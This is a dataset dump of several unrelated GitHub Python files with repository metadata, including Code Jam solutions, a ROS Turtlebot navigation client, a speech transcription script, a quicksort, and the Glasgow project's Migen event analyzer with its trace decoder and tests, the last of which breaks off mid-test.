aad9d93b67d623651393d22114af6f64db39f48d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_138/202.py | 24acce18318d21c58ecc931e58583447ad9cae57 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | from bisect import bisect_left
from copy import copy
def get_results(N, K):
N.sort()
K.sort()
L = len(N)
dwar_points = 0
ken_start = 0
for i in xrange(L):
if N[i] > K[ken_start]:
dwar_points += 1
ken_start += 1
war_points = 0
for i in xrange(len(N)-1,-1,-1):
ken_pos = bisect_left(K, N[i])
if ken_pos == len(K):
ken_choice = 0
else:
ken_choice = ken_pos
if N[i] > K[ken_choice]:
war_points += 1
del N[i]
del K[ken_choice]
return (dwar_points, war_points)
def solve(in_name, out_name):
fin = open(in_name, 'r')
L = fin.readlines()
fin.close()
T = int(L[0])
k = 1
res = []
for i in xrange(T):
n = int(L[k])
N = map(float, L[k+1].strip().split())
K = map(float, L[k+2].strip().split())
k += 3
results = get_results(N, K)
res.append('Case #' + str(i+1) + ': ' + str(results[0]) + ' ' + str(results[1]) + '\n')
fout = open(out_name, 'w')
fout.writelines(res)
fout.close()
return
#solve('D-test.in', 'D-test.out')
#solve('D-small-attempt0.in', 'D-small-attempt0.out')
solve('D-large.in', 'D-large.out')
| [
"[email protected]"
] | |
460f2179888de444cbe24cfc58ee5af6d80c60bf | 8ce262b59918cd3e4f00cfd3b2ac7a3e193f826f | /moveBase.py | 439648c8878f18aaa88c4bbc699f8b0bb88a3a59 | [
"BSD-3-Clause"
] | permissive | hanlinniu/ROS-Turtlebot3 | 05665efb38a0ac588dcbbf7fc973bc40ae02990c | 377069eba73f68f2963e57e050310e8d1c6f3977 | refs/heads/master | 2022-04-15T03:21:41.781887 | 2018-04-24T16:46:20 | 2018-04-24T16:46:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | #!/usr/bin/env python
#Move turtlebot3 from location A to location B through move_base, action client
import rospy
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
def movebase_client():
client = actionlib.SimpleActionClient('move_base',MoveBaseAction)
client.wait_for_server()
#define goal/pose
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = 0.5
goal.target_pose.pose.orientation.w = 1.0
# send goal and wait for result (Todo: shrink delay)
client.send_goal(goal)
wait = client.wait_for_result()
# handle if navigation stack is not running for move_base then shutdown otherwise retrieve results
if not wait:
rospy.logerr("Server not available!")
rospy.signal_shutdown("Server not available!")
else:
return client.get_result()
if __name__ == '__main__':
try:
rospy.init_node('movebase_client_py')
result = movebase_client()
if result:
rospy.loginfo("Reached goal!")
except rospy.ROSInterruptException:
rospy.loginfo("Interrupt, navigation finnished.")
| [
"[email protected]"
] | |
109022396ac7b45bbcd47850815b3f7da8cc38d3 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/1519.py | 648f239ba0d124b8971fef4c06e15947f1995be6 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | from bisect import insort, bisect_left, bisect_right
def palin(x):
return str(x) == str(x)[::-1]
arr = []
def gen(N):
for x in range(1, int(N**.5)+1):
if palin(x) and palin(x*x) and 1 <= x*x <= N:
insort(arr, x*x)
def solve(A, B):
l = bisect_left(arr, A)
r = bisect_right(arr, B)
return r-l
if __name__ == '__main__':
gen(10**14)
T = int(raw_input())
for case in range(1,T+1):
A, B = map(int, raw_input().split())
print "Case #{}: {}".format(case, solve(A, B))
| [
"[email protected]"
] | |
55685403b7ba08fe75f120d98b388f791e9cc8ab | dc37120202e5fc2c2f0900c3059af81830a0dcac | /AutoTranscribe_pauses.py | ee4904994ea20fbba78d8252c9ad3c32c0a563e8 | [] | no_license | AnanyaCoder/SSMT-Experiment1 | 582c4e4b3ea8df2214e3b5cdda8e589dd91458d1 | 926a6c617e486d31ec305e5fabd0a95210f5b3d5 | refs/heads/master | 2021-03-11T13:02:26.118035 | 2020-03-11T09:48:34 | 2020-03-11T09:48:34 | 246,531,457 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,151 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 30 16:33:47 2019
@author: ananya
"""
import speech_recognition as sr
choppedWaveFiles = 'split_pauses_Files/'
outputFile = 'Transcribed.txt'
f = open(outputFile, "w+")
#Generate the wave files for all the audio files
choppedList = ['s_1.wav', 's_2.wav', 's_3.wav', 's_4.wav', 's_5.wav', 's_6.wav', 's_7.wav', 's_8.wav', 's_9.wav', 's_10.wav', 's_11.wav', 's_12.wav', 's_13.wav', 's_14.wav', 's_15.wav', 's_16.wav', 's_17.wav', 's_18.wav', 's_19.wav', 's_20.wav', 's_21.wav', 's_22.wav', 's_23.wav', 's_24.wav', 's_25.wav', 's_26.wav', 's_27.wav', 's_28.wav', 's_29.wav', 's_30.wav', 's_31.wav', 's_32.wav', 's_33.wav', 's_34.wav', 's_35.wav', 's_36.wav', 's_37.wav', 's_38.wav', 's_39.wav', 's_40.wav', 's_41.wav', 's_42.wav', 's_43.wav', 's_44.wav', 's_45.wav', 's_45_1.wav', 's_45_2.wav', 's_45_3.wav', 's_45_4.wav', 's_45_5.wav', 's_45_6.wav', 's_46.wav', 's_47.wav', 's_48.wav', 's_49.wav', 's_50.wav', 's_51.wav', 's_52.wav', 's_53.wav', 's_54.wav', 's_55.wav', 's_56.wav', 's_57.wav', 's_58.wav', 's_59.wav', 's_60.wav', 's_61.wav', 's_62.wav', 's_63.wav', 's_64.wav', 's_65.wav', 's_66.wav', 's_67.wav', 's_68.wav', 's_69.wav', 's_70.wav', 's_71.wav', 's_72.wav', 's_73.wav', 's_74.wav', 's_75.wav', 's_76.wav', 's_77.wav', 's_78.wav', 's_79.wav', 's_80.wav', 's_81.wav', 's_82.wav', 's_83.wav', 's_84.wav', 's_85.wav', 's_86.wav', 's_87.wav', 's_88.wav', 's_89.wav', 's_90.wav', 's_91.wav', 's_92.wav', 's_93.wav', 's_94.wav', 's_95.wav', 's_96.wav', 's_97.wav', 's_98.wav', 's_99.wav', 's_100.wav', 's_101.wav', 's_102.wav', 's_103.wav', 's_104.wav', 's_105.wav', 's_106.wav', 's_107.wav', 's_108.wav', 's_109.wav', 's_110.wav', 's_111.wav', 's_112.wav', 's_113.wav', 's_114.wav', 's_115.wav', 's_116.wav', 's_117.wav', 's_118.wav', 's_119.wav', 's_120.wav', 's_121.wav', 's_122.wav', 's_123.wav', 's_124.wav', 's_125.wav', 's_126.wav', 's_127.wav', 's_128.wav', 's_129.wav', 's_130.wav', 's_131.wav', 's_132.wav', 's_133.wav', 's_134.wav', 's_135.wav', 's_136.wav', 's_137.wav', 's_138.wav', 's_139.wav', 's_140.wav', 's_141.wav', 's_142.wav', 's_143.wav', 's_144.wav', 's_145.wav', 's_146.wav', 's_147.wav', 's_148.wav', 's_149.wav', 's_150.wav', 's_151.wav', 's_152.wav', 's_153.wav', 's_154.wav', 's_155.wav', 's_156.wav', 's_157.wav', 's_158.wav', 's_159.wav', 's_160.wav', 's_161.wav', 's_162.wav', 's_163.wav', 's_164.wav', 's_165.wav', 's_166.wav', 's_167.wav', 's_168.wav', 's_169.wav', 's_170.wav', 's_171.wav', 's_172.wav', 's_173.wav', 's_174.wav', 's_175.wav', 's_176.wav', 's_177.wav', 's_178.wav', 's_179.wav', 's_180.wav', 's_181.wav', 's_182.wav', 's_183.wav', 's_184.wav', 's_185.wav', 's_186.wav', 's_187.wav', 's_188.wav', 's_189.wav', 's_190.wav', 's_191.wav', 's_192.wav', 's_193.wav', 's_194.wav', 's_195.wav', 's_196.wav', 's_197.wav', 's_198.wav', 's_199.wav', 's_200.wav', 's_201.wav', 's_202.wav', 's_203.wav', 's_204.wav', 's_205.wav', 's_206.wav', 's_207.wav', 's_208.wav', 's_209.wav', 's_210.wav', 's_211.wav', 's_212.wav', 's_213.wav', 's_214.wav', 's_215.wav', 's_216.wav', 's_217.wav', 's_218.wav', 's_219.wav', 's_220.wav', 's_221.wav', 's_222.wav', 's_223.wav', 's_224.wav', 's_225.wav', 's_226.wav', 's_227.wav', 's_228.wav']
for wavfile in choppedList:
file = choppedWaveFiles+wavfile
print("Processing"+file)
r = sr.Recognizer()
# recognize the chunk
with sr.AudioFile(file) as source:
# remove this if it is not working
# correctly.
#r.adjust_for_ambient_noise(source)
audio_listened = r.listen(source)
try:
# try converting it to text
rec = r.recognize_google(audio_listened,language="en-IN")
# write the output to the file.
f.write(rec+". ")
f.write("\n")
# catch any errors.
except sr.UnknownValueError:
print("Could not understand audio")
error = "Error occured at chunk"+wavfile
f.write(error+". ")
f.write("\n")
except sr.RequestError as e:
print("Could not request results. check your internet connection")
| [
"[email protected]"
] | |
f752ed117122b654d3db7de4b0b29d175e3d6732 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/sets_20200605201123.py | da4da35d79893db365b73571b8ec063d8489a308 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | def Strings(str):
values = {}
newArray = []
keys = []
for i in str:
newArray.append(i.split(":"))
for j in range(len(newArray)):
if newArray[j][0] in values:
values[newArray[j][0]] += int(newArray[j][1])
else:
values[newArray[j][0]] = int(newArray[j][1])
for k in values:
keys.append(k)
keys = sorted(keys)
# for i in keys:
# if i in values:
# answer = values[i]
print
Strings(["Z:1","B:3","C:3","Z:4","B:2"])
| [
"[email protected]"
] | |
61ca45d83eb6073d7855e1253f88d235326f2005 | db7601406ea38e0b361d9a1c54ba640ae9b132eb | /quicksort.py | 0463437079b854f611c9d76d6e9146e84805bc56 | [] | no_license | FalseF/Algorithms-and-Problem-Solving-with-Python | c06c049d7499df76795eac8b82d8f5aebe126109 | d53ee80da5ff865eef05bbe280bdc68dae4f275d | refs/heads/master | 2023-07-17T06:24:47.918286 | 2021-09-06T16:32:30 | 2021-09-06T16:32:30 | 403,690,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | cnt=0
def partition(A,low,high):
global cnt
pivot=A[high]
i=low-1
for j in range(low,high):
if(pivot>=A[j]):
i+=1
A[i],A[j]=A[j],A[i]
cnt+=1
A[i+1],A[high]=A[high],A[i+1]
cnt+=1
return i+1
def quick_sort(A,low,high):
if(low<high):
pivot=partition(A,low,high)
quick_sort(A,low,pivot-1)
quick_sort(A,pivot+1,high)
A=[10,5,4,1,8]
quick_sort(A,0,len(A)-1)
print(A)
print("Swapping time")
print(cnt) | [
"[email protected]"
] | |
5918ac3617d6a5c640a6e0aca7193152daaf268f | b0a217700c563c4f057f2aebbde8faba4b1b26d2 | /software/glasgow/gateware/analyzer.py | bb4a69bc6366646bbb3c9b40d54291e9a389cd88 | [
"0BSD",
"Apache-2.0"
] | permissive | kbeckmann/Glasgow | 5d183865da4fb499099d4c17e878a76192b691e7 | cd31e293cb99ee10a3e4a03ff26f6f124e512c64 | refs/heads/master | 2021-09-15T15:59:38.211633 | 2018-11-15T22:36:04 | 2018-11-22T21:13:59 | 157,077,707 | 3 | 0 | NOASSERTION | 2018-11-11T12:33:49 | 2018-11-11T12:33:48 | null | UTF-8 | Python | false | false | 29,898 | py | from functools import reduce
from collections import OrderedDict
from migen import *
from migen.fhdl.bitcontainer import log2_int
from migen.genlib.fifo import _FIFOInterface, SyncFIFOBuffered
from migen.genlib.coding import PriorityEncoder, PriorityDecoder
from migen.genlib.fsm import FSM
__all__ = ["EventSource", "EventAnalyzer", "TraceDecodingError", "TraceDecoder"]
REPORT_DELAY = 0b10000000
REPORT_DELAY_MASK = 0b10000000
REPORT_EVENT = 0b01000000
REPORT_EVENT_MASK = 0b11000000
REPORT_SPECIAL = 0b00000000
REPORT_SPECIAL_MASK = 0b11000000
SPECIAL_DONE = 0b000000
SPECIAL_OVERRUN = 0b000001
SPECIAL_THROTTLE = 0b000010
SPECIAL_DETHROTTLE = 0b000011
class EventSource(Module):
def __init__(self, name, kind, width, fields, depth):
assert (width > 0 and kind in ("change", "strobe") or
width == 0 and kind == "strobe")
self.name = name
self.width = width
self.fields = fields
self.depth = depth
self.kind = kind
self.data = Signal(max(1, width))
self.trigger = Signal()
class EventAnalyzer(Module):
"""
An event analyzer module.
This event analyzer is designed to observe parallel, bursty processes in real-time, and yet
degrade gracefully (i.e. without losing data or breaking most applets) when observing processes
that generate events continuously, or generate very many simultaneous events for a short time.
To do this, the event analyzer is permitted to pause any applets marked as purely synchronous
once the event FIFO high-water mark is reached.
The event analyzer tries to make efficient use of power-of-2 wide block RAMs and be highly
tunable. To achieve this, it separates the event FIFO from the event data FIFOs, and does not
storing timestamps explicitly. In a system with `n` events, each of which carries `d_n` bits
of data, there would be a single event FIFO that is `n` bits wide, where a bit being set means
that event `n` occurred at a given cycle; `n` event data FIFOs that are `d_n` bits wide each,
where, if a bit is set in the event FIFO, a data word is pushed into the event data FIFO; and
finally, one delay FIFO, where the last entry is incremented on every cycle that has
no event, and a new entry is pushed on every cycle there is at least one event. This way,
only cycles that have at least one event add new FIFO entries, and only one wide timestamp
counter needs to be maintained, greatly reducing the amount of necessary resources compared
to a more naive approach.
"""
@staticmethod
def _depth_for_width(width):
if width == 0:
return 0
elif width <= 2:
return 2048
elif width <= 4:
return 1024
elif width <= 8:
return 512
else:
return 256
def __init__(self, output_fifo, event_depth=None, delay_width=16):
assert output_fifo.width == 8
self.output_fifo = output_fifo
self.delay_width = delay_width
self.event_depth = event_depth
self.event_sources = Array()
self.done = Signal()
self.throttle = Signal()
self.overrun = Signal()
def add_event_source(self, name, kind, width, fields=(), depth=None):
if depth is None:
depth = self._depth_for_width(width)
event_source = EventSource(name, kind, width, fields, depth)
self.event_sources.append(event_source)
return event_source
def do_finalize(self):
assert len(self.event_sources) < 2 ** 6
assert max(s.width for s in self.event_sources) <= 32
# Fill the event, event data, and delay FIFOs.
throttle_on = Signal()
throttle_off = Signal()
throttle_edge = Signal()
throttle_fifos = []
self.sync += [
If(~self.throttle & throttle_on,
self.throttle.eq(1),
throttle_edge.eq(1)
).Elif(self.throttle & throttle_off,
self.throttle.eq(0),
throttle_edge.eq(1)
).Else(
throttle_edge.eq(0)
)
]
overrun_trip = Signal()
overrun_fifos = []
self.sync += [
If(overrun_trip,
self.overrun.eq(1)
)
]
event_width = 1 + len(self.event_sources)
if self.event_depth is None:
event_depth = min(self._depth_for_width(event_width),
self._depth_for_width(self.delay_width))
else:
event_depth = self.event_depth
self.submodules.event_fifo = event_fifo = \
SyncFIFOBuffered(width=event_width, depth=event_depth)
throttle_fifos.append(self.event_fifo)
self.comb += [
event_fifo.din.eq(Cat(self.throttle, [s.trigger for s in self.event_sources])),
event_fifo.we.eq(reduce(lambda a, b: a | b, (s.trigger for s in self.event_sources)) |
throttle_edge)
]
self.submodules.delay_fifo = delay_fifo = \
SyncFIFOBuffered(width=self.delay_width, depth=event_depth)
delay_timer = self._delay_timer = Signal(self.delay_width)
delay_ovrun = ((1 << self.delay_width) - 1)
delay_max = delay_ovrun - 1
self.sync += [
If(delay_fifo.we,
delay_timer.eq(0)
).Else(
delay_timer.eq(delay_timer + 1)
)
]
self.comb += [
delay_fifo.din.eq(Mux(self.overrun, delay_ovrun, delay_timer)),
delay_fifo.we.eq(event_fifo.we | (delay_timer == delay_max) |
self.done | self.overrun),
]
for event_source in self.event_sources:
if event_source.width > 0:
event_source.submodules.data_fifo = event_data_fifo = \
SyncFIFOBuffered(event_source.width, event_source.depth)
self.submodules += event_source
throttle_fifos.append(event_data_fifo)
self.comb += [
event_data_fifo.din.eq(event_source.data),
event_data_fifo.we.eq(event_source.trigger),
]
else:
event_source.submodules.data_fifo = _FIFOInterface(1, 0)
# Throttle applets based on FIFO levels with hysteresis.
self.comb += [
throttle_on .eq(reduce(lambda a, b: a | b,
(f.fifo.level >= f.depth - f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
throttle_off.eq(reduce(lambda a, b: a & b,
(f.fifo.level < f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
]
# Detect imminent FIFO overrun and trip overrun indication.
self.comb += [
overrun_trip.eq(reduce(lambda a, b: a | b,
(f.fifo.level == f.depth - 2
for f in throttle_fifos)))
]
# Dequeue events, and serialize events and event data.
self.submodules.event_encoder = event_encoder = \
PriorityEncoder(width=len(self.event_sources))
self.submodules.event_decoder = event_decoder = \
PriorityDecoder(width=len(self.event_sources))
self.comb += event_decoder.i.eq(event_encoder.o)
self.submodules.serializer = serializer = FSM(reset_state="WAIT-EVENT")
rep_overrun = Signal()
rep_throttle_new = Signal()
rep_throttle_cur = Signal()
delay_septets = 5
delay_counter = Signal(7 * delay_septets)
serializer.act("WAIT-EVENT",
If(delay_fifo.readable,
delay_fifo.re.eq(1),
NextValue(delay_counter, delay_counter + delay_fifo.dout + 1),
If(delay_fifo.dout == delay_ovrun,
NextValue(rep_overrun, 1),
NextState("REPORT-DELAY")
)
),
If(event_fifo.readable,
event_fifo.re.eq(1),
NextValue(event_encoder.i, event_fifo.dout[1:]),
NextValue(rep_throttle_new, event_fifo.dout[0]),
If((event_fifo.dout != 0) | (rep_throttle_cur != event_fifo.dout[0]),
NextState("REPORT-DELAY")
)
).Elif(self.done,
NextState("REPORT-DELAY")
)
)
serializer.act("REPORT-DELAY",
If(delay_counter >= 128 ** 4,
NextState("REPORT-DELAY-5")
).Elif(delay_counter >= 128 ** 3,
NextState("REPORT-DELAY-4")
).Elif(delay_counter >= 128 ** 2,
NextState("REPORT-DELAY-3")
).Elif(delay_counter >= 128 ** 1,
NextState("REPORT-DELAY-2")
).Else(
NextState("REPORT-DELAY-1")
)
)
for septet_no in range(delay_septets, 0, -1):
if septet_no == 1:
next_state = [
NextValue(delay_counter, 0),
If(rep_overrun,
NextState("REPORT-OVERRUN")
).Elif(rep_throttle_cur != rep_throttle_new,
NextState("REPORT-THROTTLE")
).Elif(event_encoder.i,
NextState("REPORT-EVENT")
).Elif(self.done,
NextState("REPORT-DONE")
).Else(
NextState("WAIT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-DELAY-%d" % (septet_no - 1))
]
serializer.act("REPORT-DELAY-%d" % septet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(
REPORT_DELAY | delay_counter.part((septet_no - 1) * 7, 7)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-THROTTLE",
If(self.output_fifo.writable,
NextValue(rep_throttle_cur, rep_throttle_new),
If(rep_throttle_new,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_THROTTLE),
).Else(
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DETHROTTLE),
),
self.output_fifo.we.eq(1),
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
)
)
event_source = self.event_sources[event_encoder.o]
event_data = Signal(32)
serializer.act("REPORT-EVENT",
If(self.output_fifo.writable,
NextValue(event_encoder.i, event_encoder.i & ~event_decoder.o),
self.output_fifo.din.eq(
REPORT_EVENT | event_encoder.o),
self.output_fifo.we.eq(1),
NextValue(event_data, event_source.data_fifo.dout),
event_source.data_fifo.re.eq(1),
If(event_source.width > 24,
NextState("REPORT-EVENT-DATA-4")
).Elif(event_source.width > 16,
NextState("REPORT-EVENT-DATA-3")
).Elif(event_source.width > 8,
NextState("REPORT-EVENT-DATA-2")
).Elif(event_source.width > 0,
NextState("REPORT-EVENT-DATA-1")
).Else(
If(event_encoder.i & ~event_decoder.o,
NextState("REPORT-EVENT")
).Else(
NextState("WAIT-EVENT")
)
)
)
)
for octet_no in range(4, 0, -1):
if octet_no == 1:
next_state = [
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-EVENT-DATA-%d" % (octet_no - 1))
]
serializer.act("REPORT-EVENT-DATA-%d" % octet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(event_data.part((octet_no - 1) * 8, 8)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-DONE",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DONE),
self.output_fifo.we.eq(1),
NextState("DONE")
)
)
serializer.act("DONE",
If(~self.done,
NextState("WAIT-EVENT")
)
)
serializer.act("REPORT-OVERRUN",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_OVERRUN),
self.output_fifo.we.eq(1),
NextState("OVERRUN")
)
)
serializer.act("OVERRUN",
NextState("OVERRUN")
)
class TraceDecodingError(Exception):
pass
class TraceDecoder:
"""
Event analyzer trace decoder.
Decodes raw analyzer traces into a timestamped sequence of maps from event fields to
their values.
"""
def __init__(self, event_sources, absolute_timestamps=True):
self.event_sources = event_sources
self.absolute_timestamps = absolute_timestamps
self._state = "IDLE"
self._byte_off = 0
self._timestamp = 0
self._delay = 0
self._event_src = 0
self._event_off = 0
self._event_data = 0
self._pending = OrderedDict()
self._timeline = []
def events(self):
"""
Return names and widths for all events that may be emitted by this trace decoder.
"""
yield ("throttle", "throttle", 1)
for event_src in self.event_sources:
if event_src.fields:
for field_name, field_width in event_src.fields:
yield ("%s-%s" % (field_name, event_src.name), event_src.kind, field_width)
else:
yield (event_src.name, event_src.kind, event_src.width)
def _flush_timestamp(self):
if self._delay == 0:
return
if self._pending:
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
if self.absolute_timestamps:
self._timestamp += self._delay
else:
self._timestamp = self._delay
self._delay = 0
def process(self, data):
"""
Incrementally parse a chunk of analyzer trace, and record events in it.
"""
for octet in data:
is_delay = ((octet & REPORT_DELAY_MASK) == REPORT_DELAY)
is_event = ((octet & REPORT_EVENT_MASK) == REPORT_EVENT)
is_special = ((octet & REPORT_SPECIAL_MASK) == REPORT_SPECIAL)
special = octet & ~REPORT_SPECIAL
if self._state == "IDLE" and is_delay:
self._state = "DELAY"
self._delay = octet & ~REPORT_DELAY_MASK
elif self._state == "DELAY" and is_delay:
self._delay = (self._delay << 7) | (octet & ~REPORT_DELAY_MASK)
elif self._state == "DELAY" and is_special and \
special in (SPECIAL_THROTTLE, SPECIAL_DETHROTTLE):
self._flush_timestamp()
if special == SPECIAL_THROTTLE:
self._pending["throttle"] = 1
elif special == SPECIAL_DETHROTTLE:
self._pending["throttle"] = 0
elif self._state in ("IDLE", "DELAY") and is_event:
self._flush_timestamp()
if (octet & ~REPORT_EVENT_MASK) > len(self.event_sources):
raise TraceDecodingError("at byte offset %d: event source out of bounds" %
self._byte_off)
self._event_src = self.event_sources[octet & ~REPORT_EVENT_MASK]
if self._event_src.width == 0:
self._pending[self._event_src.name] = None
self._state = "IDLE"
else:
self._event_off = self._event_src.width
self._event_data = 0
self._state = "EVENT"
elif self._state == "EVENT":
self._event_data <<= 8
self._event_data |= octet
if self._event_off > 8:
self._event_off -= 8
else:
if self._event_src.fields:
offset = 0
for field_name, field_width in self._event_src.fields:
self._pending["%s-%s" % (field_name, self._event_src.name)] = \
(self._event_data >> offset) & ((1 << field_width) - 1)
offset += field_width
else:
self._pending[self._event_src.name] = self._event_data
self._state = "IDLE"
elif self._state in "DELAY" and is_special and \
special in (SPECIAL_DONE, SPECIAL_OVERRUN):
self._flush_timestamp()
if special == SPECIAL_DONE:
self._state = "DONE"
elif special == SPECIAL_OVERRUN:
self._state = "OVERRUN"
else:
raise TraceDecodingError("at byte offset %d: invalid byte %#04x for state %s" %
(self._byte_off, octet, self._state))
self._byte_off += 1
def flush(self, pending=False):
"""
Return the complete event timeline since the start of decoding or the previous flush.
If ``pending`` is ``True``, also flushes pending events; this may cause duplicate
timestamps if more events arrive after the flush.
"""
if self._state == "OVERRUN":
self._timeline.append((self._timestamp, "overrun"))
elif pending and self._pending or self._state == "DONE":
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
timeline, self._timeline = self._timeline, []
return timeline
def is_done(self):
return self._state in ("DONE", "OVERRUN")
# -------------------------------------------------------------------------------------------------
import unittest
from migen.fhdl import verilog
from . import simulation_test
class EventAnalyzerTestbench(Module):
def __init__(self, **kwargs):
self.submodules.fifo = SyncFIFOBuffered(width=8, depth=64)
self.submodules.dut = EventAnalyzer(self.fifo, **kwargs)
def trigger(self, index, data):
yield self.dut.event_sources[index].trigger.eq(1)
yield self.dut.event_sources[index].data.eq(data)
def step(self):
yield
for event_source in self.dut.event_sources:
yield event_source.trigger.eq(0)
def read(self, count, limit=128):
data = []
cycle = 0
while len(data) < count:
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if not (yield self.fifo.readable):
raise ValueError("FIFO underflow")
data.append((yield from self.fifo.read()))
cycle = 16
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if (yield self.fifo.readable):
raise ValueError("junk in FIFO: %#04x at %d" % ((yield self.fifo.dout), count))
return data
class EventAnalyzerTestCase(unittest.TestCase):
def setUp(self):
self.tb = EventAnalyzerTestbench(event_depth=16)
def configure(self, tb, sources):
for n, args in enumerate(sources):
if not isinstance(args, tuple):
args = (args,)
tb.dut.add_event_source(str(n), "strobe", *args)
def assertEmitted(self, tb, data, decoded, flush_pending=True):
self.assertEqual((yield from tb.read(len(data))), data)
decoder = TraceDecoder(self.tb.dut.event_sources)
decoder.process(data)
self.assertEqual(decoder.flush(flush_pending), decoded)
@simulation_test(sources=(8,))
def test_one_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
], [
(2, {"0": 0xaa}),
])
@simulation_test(sources=(8,8))
def test_two_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.trigger(1, 0xbb)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
REPORT_EVENT|1, 0xbb,
], [
(2, {"0": 0xaa, "1": 0xbb}),
])
@simulation_test(sources=(12,))
def test_one_12bit_src(self, tb):
yield from tb.trigger(0, 0xabc)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0x0a, 0xbc,
], [
(2, {"0": 0xabc}),
])
@simulation_test(sources=(16,))
def test_one_16bit_src(self, tb):
yield from tb.trigger(0, 0xabcd)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd,
], [
(2, {"0": 0xabcd}),
])
@simulation_test(sources=(24,))
def test_one_24bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef
], [
(2, {"0": 0xabcdef}),
])
@simulation_test(sources=(32,))
def test_one_32bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef12)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef, 0x12
], [
(2, {"0": 0xabcdef12}),
])
@simulation_test(sources=(0,))
def test_one_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
], [
(2, {"0": None}),
])
@simulation_test(sources=(0,0))
def test_two_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1,
], [
(2, {"0": None, "1": None}),
])
@simulation_test(sources=(0,1))
def test_0bit_1bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1, 0b1
], [
(2, {"0": None, "1": 0b1}),
])
@simulation_test(sources=(1,0))
def test_1bit_0bit_src(self, tb):
yield from tb.trigger(0, 1)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_EVENT|1,
], [
(2, {"0": 0b1, "1": None}),
])
@simulation_test(sources=((3, (("a", 1), ("b", 2))),))
def test_fields(self, tb):
yield from tb.trigger(0, 0b101)
yield from tb.step()
yield from tb.trigger(0, 0b110)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b101,
REPORT_DELAY|1,
REPORT_EVENT|0, 0b110,
], [
(2, {"a-0": 0b1, "b-0": 0b10}),
(3, {"a-0": 0b0, "b-0": 0b11}),
])
@simulation_test(sources=(8,))
def test_delay(self, tb):
yield
yield
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield
yield from tb.trigger(0, 0xbb)
yield from tb.step()
yield
yield
